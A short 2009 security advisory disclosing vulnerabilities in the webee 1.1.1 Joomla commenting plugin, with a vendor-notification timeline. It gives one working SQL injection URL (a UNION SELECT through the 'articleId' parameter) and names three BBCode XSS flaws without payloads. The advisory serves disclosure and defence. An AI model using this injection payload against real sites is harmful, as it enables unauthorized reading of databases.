Sunday, 15 November 2009 00:00

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

  3. [url] BBCode [img] Tag XSS

  4. [size] BBCode [url] Tag XSS


UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2


  • Vulnerabilities Discovered: 4 November 2009
  • Vendor Notified: 4 November 2009
  • Vendor Notified Again: 9 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35

Add your comment

Your name:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Joomla Extensions